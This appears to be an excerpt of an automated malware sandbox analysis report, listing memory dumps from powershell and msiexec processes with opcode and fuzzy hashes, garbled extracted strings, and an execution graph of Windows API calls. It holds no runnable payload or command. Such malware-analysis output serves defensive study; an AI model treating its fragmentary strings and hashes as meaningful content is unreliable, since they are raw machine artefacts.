                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                              • Instruction ID: 59419d3882aa5be04f4c35b700d292f113443a0f30f6a94ab41da6d1852e2680
                                                                              • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                              • Instruction Fuzzy Hash: F6D067B0D042099F8780EFADC94156EFBF4EB48200F60C5AAC919E7301E7329A128BD1
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 01c3df9d4b95ce520c8734888186f8f0d4b8f9fee7f9563eb7413bee84420908
                                                                              • Instruction ID: 87a3869d4fa1c579637bd69cc56bdfdf09f0c134a3214bb816af9741635a63cd
                                                                              • Opcode Fuzzy Hash: 01c3df9d4b95ce520c8734888186f8f0d4b8f9fee7f9563eb7413bee84420908
                                                                              • Instruction Fuzzy Hash: 7CD06234A14149DF8794DF64E45646DBBB6FB44215F104159D90A93351EA305851CBC1
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 837e2879d5505a2784c87c8a76038bed1caa67cca358fca40e3682de82cf4211
                                                                              • Instruction ID: 36be45c4448b38c9046affd8916db67b434b373a344e40c0b928b7eef03428db
                                                                              • Opcode Fuzzy Hash: 837e2879d5505a2784c87c8a76038bed1caa67cca358fca40e3682de82cf4211
                                                                              • Instruction Fuzzy Hash: ACD04C309041499BCB58AB64D55A4FDBB75FA10206B80415DD90B56192EA241556CAC1
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ec6b66ed24633fca35121b38a00cd7fe270aa44149dbfe0a06b9ea89b1f77715
                                                                              • Instruction ID: 0761f1a5db9535a5b278aaa0a942a1947769cd7e3111e6ce8b4599f8eac5400c
                                                                              • Opcode Fuzzy Hash: ec6b66ed24633fca35121b38a00cd7fe270aa44149dbfe0a06b9ea89b1f77715
                                                                              • Instruction Fuzzy Hash: 69A001742411009BDA44DA94C992854B762AB85629B29C49BA92A8F396CB63E9039A90
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345390385.0000000009040000.00000040.00001000.00020000.00000000.sdmp, Offset: 09040000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9040000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4500039169db410d9f41b27a645c6485105b91fb4d12efbca57531523defeabb
                                                                              • Instruction ID: 2bd1658af7396c4bda1fa9247754f47b00c22a2c144f2e945cfe09708b25b23d
                                                                              • Opcode Fuzzy Hash: 4500039169db410d9f41b27a645c6485105b91fb4d12efbca57531523defeabb
                                                                              • Instruction Fuzzy Hash: A1E0267944B3969FCB02863088154447FE16D9610435C88AF8992CB293D1190845CB41
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$XRoq$XRoq$XRoq$tPjq$tPjq$tPjq$tPjq$$jq$$jq$$jq$$jq$$jq
                                                                              • API String ID: 0-3607640656
                                                                              • Opcode ID: 28f2d6f8e2d929c9ce146fc078fabdfbf5a46881c5ce54b7ce4836dca3c09308
                                                                              • Instruction ID: 19105ced4cfcefc41ff067cd202867127ed082b9e1509382b4f18d424b53c8d0
                                                                              • Opcode Fuzzy Hash: 28f2d6f8e2d929c9ce146fc078fabdfbf5a46881c5ce54b7ce4836dca3c09308
                                                                              • Instruction Fuzzy Hash: 99023BF0F2020BDFCB248F64E7506AB7BA6EF89310F548469E8159B294CB75DD45CBA0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$4'jq$4'jq$d5wk$tPjq$tPjq$$jq$$jq$$jq$$jq$}l$}l
                                                                              • API String ID: 0-1110074392
                                                                              • Opcode ID: a999bb1208c15ecaf6386cf57639f70da4fbee830e8e4f09e24c2723a8d22090
                                                                              • Instruction ID: 929f5a6dbf4d7bf2d4dbdb06bdde1112940b3e53e113b930a85fb21278783251
                                                                              • Opcode Fuzzy Hash: a999bb1208c15ecaf6386cf57639f70da4fbee830e8e4f09e24c2723a8d22090
                                                                              • Instruction Fuzzy Hash: 24E126F172434B8FCF258A68899076ABFB6AFC2311F1488AAD805CB351DB35CD45C7A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq$}l$}l
                                                                              • API String ID: 0-3143649883
                                                                              • Opcode ID: 5903dade531a1167a7841d6c67f7010ba1a96562539455ec95106d758bdc0892
                                                                              • Instruction ID: 4afc40c778260eae8a740e77cc280f0f2b9f36e1c3211887371b03b98462f30c
                                                                              • Opcode Fuzzy Hash: 5903dade531a1167a7841d6c67f7010ba1a96562539455ec95106d758bdc0892
                                                                              • Instruction Fuzzy Hash: F1B147F17283468FDB218A698900B66BFE6EFC2610F1484ABE445CF391DA76CC05C771
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$d%pq$d%pq$d%pq$d%pq$tPjq$tPjq$$jq
                                                                              • API String ID: 0-1806847741
                                                                              • Opcode ID: 07ffe3427f7a0aac33bf11249d26852e1f4923d3bf9d9f125365ffbe1d483314
                                                                              • Instruction ID: 869c6607a6d4187e7f2228f305fabaeb3bb9ce25c6a3c22bbdf0c55b9e9770ac
                                                                              • Opcode Fuzzy Hash: 07ffe3427f7a0aac33bf11249d26852e1f4923d3bf9d9f125365ffbe1d483314
                                                                              • Instruction Fuzzy Hash: 738117F1F20216DFCB249F28C95066ABBE6EFC4311F168469E8019B391DB71DD48C7A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$TQoq$TQoq$tPjq$$jq$$jq$$jq
                                                                              • API String ID: 0-2666386787
                                                                              • Opcode ID: ff5cdbcec028445a09ff50fa3d39d864b0e434f9cddae09e7f2927673c796384
                                                                              • Instruction ID: 2f10a29d33345c06a16c9aaf539ca888978e04edfdafa246f5badbe220e77404
                                                                              • Opcode Fuzzy Hash: ff5cdbcec028445a09ff50fa3d39d864b0e434f9cddae09e7f2927673c796384
                                                                              • Instruction Fuzzy Hash: 0A51D2F1E3020BDFDB24CE05C5447AAB7B2BF45321F5A8566E8149B2A0C771DD88CBA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$4'jq$4'jq$x.xk$-xk
                                                                              • API String ID: 0-1662749126
                                                                              • Opcode ID: c784849a989ac0f4af834c713359cd0a2fab21b988ed4ca5c9e2cf4176af4911
                                                                              • Instruction ID: 4cef1cf76c0b07a22e9906c5111d95e1ef4a69ca70af1279f7d69dfccc764fe1
                                                                              • Opcode Fuzzy Hash: c784849a989ac0f4af834c713359cd0a2fab21b988ed4ca5c9e2cf4176af4911
                                                                              • Instruction Fuzzy Hash: CE1241B4A102158FD764DB54CA50BDEBBB2FF85300F1085E4D9096B381DB76AD85CFA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$$jq$$jq$$jq$$jq
                                                                              • API String ID: 0-210473685
                                                                              • Opcode ID: b89eb130c5ad5d7242c1661c7257d528477e81582a1e5059ca670d3ac3de0ebb
                                                                              • Instruction ID: 344244adc71dc60f4b090d51c179bd17254b2e0d4902b3188f25b574f7027b84
                                                                              • Opcode Fuzzy Hash: b89eb130c5ad5d7242c1661c7257d528477e81582a1e5059ca670d3ac3de0ebb
                                                                              • Instruction Fuzzy Hash: 7B6106F272424EDFCB298E69D4006AABBB6EFC2311F14C5BAD8058B255DB35CD45C7A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345303997.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: tPjq$tPjq$$jq$$jq$$jq
                                                                              • API String ID: 0-3881469342
                                                                              • Opcode ID: 7bae8c954618b9a7301399565c99f59ff0e3d74fc088b0b49d493b27f31ce4b6
                                                                              • Instruction ID: a18e12a74424d2c5624b0f5631936915350b9c116027684e59fa58bd08edd1b0
                                                                              • Opcode Fuzzy Hash: 7bae8c954618b9a7301399565c99f59ff0e3d74fc088b0b49d493b27f31ce4b6
                                                                              • Instruction Fuzzy Hash: C9D1D331B00209DFCB559F6CC95166BBBE6FF84310F24886AE9159B391DB31DD85CBA0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$tPjq$$jq$$jq$$jq
                                                                              • API String ID: 0-728028659
                                                                              • Opcode ID: 74f301c03ee12ec2a3cdbcc000a059b269dcd067f6a6eecd52b78936b672b604
                                                                              • Instruction ID: 99457a23a887ff71f0ca4b103a2170bbddb8f4392b02be6db56d1ca7afc39cec
                                                                              • Opcode Fuzzy Hash: 74f301c03ee12ec2a3cdbcc000a059b269dcd067f6a6eecd52b78936b672b604
                                                                              • Instruction Fuzzy Hash: 2B61F6F0E34307DFDB298E14EB447AA77B1AF45301F54806AE8156B2A1C7B5DD81CBA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$$jq$$jq$$jq
                                                                              • API String ID: 0-103809679
                                                                              • Opcode ID: 4a50f017de759cb8d1abbaaefb64fe15b7e5e76b86265be8a0fdb2b7f99f68c9
                                                                              • Instruction ID: 497a48fb3e89bfec64593bf813ea490966a28e4bca82fe88608d1d0f0215b28e
                                                                              • Opcode Fuzzy Hash: 4a50f017de759cb8d1abbaaefb64fe15b7e5e76b86265be8a0fdb2b7f99f68c9
                                                                              • Instruction Fuzzy Hash: 7A4106F0B242169FCB359A3489106AF7FA7AFC2600F14446ED905CB295EB31D945CBB2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$$jq$$jq$$jq
                                                                              • API String ID: 0-103809679
                                                                              • Opcode ID: a39e4f4a836b1869943cf47aa5f69f39b63316fa61a2fdc658f91d1d2509eab9
                                                                              • Instruction ID: 671e2088f43e64f8a34b2a74d7395d5826e0239a1defb122f6a7e2427df6f9d5
                                                                              • Opcode Fuzzy Hash: a39e4f4a836b1869943cf47aa5f69f39b63316fa61a2fdc658f91d1d2509eab9
                                                                              • Instruction Fuzzy Hash: E44128F5F20217CFCB218E69845067BBBE6FFC5210F25807AD816C7241DA35C909C7A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$d%pq$d%pq$d%pq$tPjq
                                                                              • API String ID: 0-3681948632
                                                                              • Opcode ID: e1608875faf9ec4dd258b45b07e5f9fa09bb2ef9945d612f9f43ac21d02119ab
                                                                              • Instruction ID: f0841bf6abfb5567ca306b23e9a7e2370d7aa76fc38c406ce0d448f777786003
                                                                              • Opcode Fuzzy Hash: e1608875faf9ec4dd258b45b07e5f9fa09bb2ef9945d612f9f43ac21d02119ab
                                                                              • Instruction Fuzzy Hash: AA31BFF0F20216DFCB24DF18C540A6ABBB2FF88710F268555E805AB360C671ED05CB90
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (ojq$(ojq$(ojq$(ojq
                                                                              • API String ID: 0-3475039101
                                                                              • Opcode ID: dfa6852b343074cf4c464e84965606fc888737dc447d2493f19fadf48492c452
                                                                              • Instruction ID: 19bd0197533ad0233354c349617f626ea0d909cf3c5fce30110de45f8d20794c
                                                                              • Opcode Fuzzy Hash: dfa6852b343074cf4c464e84965606fc888737dc447d2493f19fadf48492c452
                                                                              • Instruction Fuzzy Hash: 63F16AF1B24306DFDB208F68C810B6A7BA2EFC5310F15C4AAE9158B291DB35DC49CB61
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: XRoq$XRoq$tPjq$$jq
                                                                              • API String ID: 0-3567977740
                                                                              • Opcode ID: 139e068a4b817f491d9aca181ebdd157a9ba766d8ed1a53593b5bdd4baa96339
                                                                              • Instruction ID: 7481b554a68e790f7c1fc3cd795d1cbe75873b86674208d39c357bda9842738c
                                                                              • Opcode Fuzzy Hash: 139e068a4b817f491d9aca181ebdd157a9ba766d8ed1a53593b5bdd4baa96339
                                                                              • Instruction Fuzzy Hash: DE4180F1E24206DFCB24CE55E354AAAB7F3AF48710F19C0AAE8155B254C771DD44CBA0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $jq$$jq$$jq$$jq
                                                                              • API String ID: 0-2428501249
                                                                              • Opcode ID: 201ac533f7589c3ca60d4b4669792cdd52b09559def71f186261bb31167b94fb
                                                                              • Instruction ID: 47aa0e724fbdd8eaedac999d8e5cd1e5647aa3a0c6c3a6e72df9cd7e49ac036e
                                                                              • Opcode Fuzzy Hash: 201ac533f7589c3ca60d4b4669792cdd52b09559def71f186261bb31167b94fb
                                                                              • Instruction Fuzzy Hash: 3C215AF13303028BDB34D56A9940727A6DB9BC7618F24882AA889C7381DDB6E881C760
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $jq$$jq$$jq$$jq
                                                                              • API String ID: 0-2428501249
                                                                              • Opcode ID: 307fbc4bd45f259839d38ac61e7e5ea7441088a9215447f94e822dc0be0a03ec
                                                                              • Instruction ID: 3ecfdf65e17080bd659045706d5ef0cc9955964e309b2f35625d7b4d96e98887
                                                                              • Opcode Fuzzy Hash: 307fbc4bd45f259839d38ac61e7e5ea7441088a9215447f94e822dc0be0a03ec
                                                                              • Instruction Fuzzy Hash: 5A21F1F5A3538B9FCB218E65C5002A6BBB5EF46211F58C2BBE88497242D731C985CB61
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$$jq$$jq
                                                                              • API String ID: 0-1496060811
                                                                              • Opcode ID: a7cab2a3f3a5061fa0a0a7039481d6642603029c81451b85a2aefb53342da9d5
                                                                              • Instruction ID: 7bf9b54155e023fcdd0c732fb72d2877875614f50f91d3de133f5bfeb4db93d0
                                                                              • Opcode Fuzzy Hash: a7cab2a3f3a5061fa0a0a7039481d6642603029c81451b85a2aefb53342da9d5
                                                                              • Instruction Fuzzy Hash: 5C01DF6032E7964FC3371238196056A6FB79FC351072A41EBC451DB2A3CE288C0AC3B7

                                                                              Execution Graph

                                                                              Execution Coverage:9.6%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:25
                                                                              Total number of Limit Nodes:2
                                                                              execution_graph (node id: address [resolved API] -> successor node ids)
                                                                              18386: 24b41f9c -> 18387
                                                                              18387: 24b41fa2 -> 18390
                                                                              18390: 24b434cd -> 18391
                                                                              18391: 24b434d0 -> 18392, 18395, 18398
                                                                              18392: 24b4355a
                                                                              18395: 24b44357 -> 18396, 18401
                                                                              18396: 24b44395 -> 18392
                                                                              18398: 24b44360 -> 18399
                                                                              18399: 24b4186c CreateWindowExW -> 18400
                                                                              18400: 24b44395 -> 18392
                                                                              18401: 24b4186c -> 18402
                                                                              18402: 24b443b0 CreateWindowExW -> 18404
                                                                              18404: 24b444d4 -> 18404
                                                                              18405: 24b49038 OleInitialize -> 18406
                                                                              18406: 24b4909c
                                                                              18407: 24b42180 -> 18410
                                                                              18408: 24b4218a
                                                                              18410: 24b421d9 -> 18412
                                                                              18411: 24b42204 -> 18408
                                                                              18412: 24b421ec -> 18411, 18413
                                                                              18413: 24b42408 GetModuleHandleW -> 18414
                                                                              18414: 24b42435 -> 18408
                                                                              18415: 24b46b42 -> 18416, 18417
                                                                              18416: 24b46b9a CallWindowProcW -> 18417
                                                                              18417: 24b46b49

                                                                              Control-flow Graph

                                                                               control_flow_graph: function 5b5362 [graph data omitted; basic blocks 5b5362-5b55ec; calls 5b41a0, 5b3cc0, 5b5658, 5b5650, 5b57c0]
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3267277253.00000000005B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_5b0000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0oMp$LjMp$LjMp$PHjq$PHjq
                                                                              • API String ID: 0-3395041758
                                                                              • Opcode ID: 04ccab70b6629f8a63beed124f0edc4a8b3720670c1625e134d6955e0b15bd97
                                                                              • Instruction ID: 5ac8d0e331677881857c1a78219d9ac9ad8452fc912e08aeef505e4f8ff890bb
                                                                              • Opcode Fuzzy Hash: 04ccab70b6629f8a63beed124f0edc4a8b3720670c1625e134d6955e0b15bd97
                                                                              • Instruction Fuzzy Hash: 2291C574D006188FDB18DFA9D884A9DBFF2BF88311F15C069E809AB365EB34A945CF10
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: K
                                                                              • API String ID: 0-856455061
                                                                              • Opcode ID: 2b944cc9ff2e1196773a798c9d39312f2bee126c582e6a4f5955640fccfeba67
                                                                              • Instruction ID: deebb033337692d05f676e8ad3c30fdbc9ca94a11a5b5614b51b21fc87e2c3f4
                                                                              • Opcode Fuzzy Hash: 2b944cc9ff2e1196773a798c9d39312f2bee126c582e6a4f5955640fccfeba67
                                                                              • Instruction Fuzzy Hash: 5033D471C146198EDB11EF68C894ADDFBB1FF99300F50D69AE44867225EB70AAC4CF81
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: K
                                                                              • API String ID: 0-856455061
                                                                              • Opcode ID: e688aef343bba132d045b40d207b8ae7f554bcb2ce51d2b9e51fbf6a42e25e8d
                                                                              • Instruction ID: a4bf979bcbaf5480a092fd2e01b5c494d915e4901c1dfe4ba45eece6e79966df
                                                                              • Opcode Fuzzy Hash: e688aef343bba132d045b40d207b8ae7f554bcb2ce51d2b9e51fbf6a42e25e8d
                                                                              • Instruction Fuzzy Hash: F4B116B1D056198EDB11DF69C8847DDFBB2FF99300F10C69AE4086B265EB74AA85CF40
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 90d2eabc2c3a6023b09f011ab88ea550b10b15bc5c0fffce673ce77ee196d741
                                                                              • Instruction ID: 832ff6b8a48d3955541751cdc204ffd1fb90d66c715079ee8ba58447c91c8551
                                                                              • Opcode Fuzzy Hash: 90d2eabc2c3a6023b09f011ab88ea550b10b15bc5c0fffce673ce77ee196d741
                                                                              • Instruction Fuzzy Hash: 6A72CFB4E012298FDB65CF69C985BDDBBB2BB49300F5485E9D808A7355E734AE81CF40
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 27fd15bf485bc742b16798f1c91530e275b5a494808de2f312155bf1fe578384
                                                                              • Instruction ID: 78efbe3c7fc5badef0c9d083891c14eafb270355840a8cd074ece41f512aab70
                                                                              • Opcode Fuzzy Hash: 27fd15bf485bc742b16798f1c91530e275b5a494808de2f312155bf1fe578384
                                                                              • Instruction Fuzzy Hash: 632227B4E01219CFDB14DFA8C984B9DBBB2FF88304F1085A9D409AB395DB359A85CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0ba62d8cadf19cf51403c452f924d0b59d8dccab06116ba3baffdb5a10074899
                                                                              • Instruction ID: b6aa722534cc1341e997f39ba5e80c5ce6880c736473995e43da15f8882b7c89
                                                                              • Opcode Fuzzy Hash: 0ba62d8cadf19cf51403c452f924d0b59d8dccab06116ba3baffdb5a10074899
                                                                              • Instruction Fuzzy Hash: 25C1A178E01218CFDB14DFA5C958B9DBBB6FF88301F1081A9D809AB365DB395A85CF50
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 646a02b75b3477ddd9ee6090e1e7ae12009baa3feddb4e0af56ebf669fc0c5a2
                                                                              • Instruction ID: 4237d95260c3a7fadf1ab7a072d6787e3e8037ef7f5493a9370cd2e70fe316e4
                                                                              • Opcode Fuzzy Hash: 646a02b75b3477ddd9ee6090e1e7ae12009baa3feddb4e0af56ebf669fc0c5a2
                                                                              • Instruction Fuzzy Hash: 70A10674D00208CFDB14DFA9C994BDDBBB1FF88311F2092A9E509AB2A1DB749984CF54
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ac9490025391116d47f1b7097c380cb4f70fcf183a86d1a40855843b95fb2e9e
                                                                              • Instruction ID: 651506d63a81c6810e60e9ab80743dd3ea7ae541b063770a24d6ab4482bdbc14
                                                                              • Opcode Fuzzy Hash: ac9490025391116d47f1b7097c380cb4f70fcf183a86d1a40855843b95fb2e9e
                                                                              • Instruction Fuzzy Hash: F8A10570D00208CFDB14DFA9C958BDDBBB1FF88310F2092A9E509AB2A1DB759985CF55
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_24970000_msiexec.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e1b7d9414e9087cd32e855ef6de490bb4fe68f2ccefb9f1b2881f8904036b993
                                                                              • Instruction ID: dd5573551a3fa629d8eed1ebc7597c3ea82c8c02afbfc6f61df2bf6aa8c15db7
                                                                              • Opcode Fuzzy Hash: e1b7d9414e9087cd32e855ef6de490bb4fe68f2ccefb9f1b2881f8904036b993
                                                                              • Instruction Fuzzy Hash: 45A182B5E012198FEB68CF6AC944B9DBBF2BF89300F14C1E9D508AB254DB745A85CF11
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3285129795.0000000024970000.00000040.00000800.00020000.00000000.sdmp, Offset: 24970000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
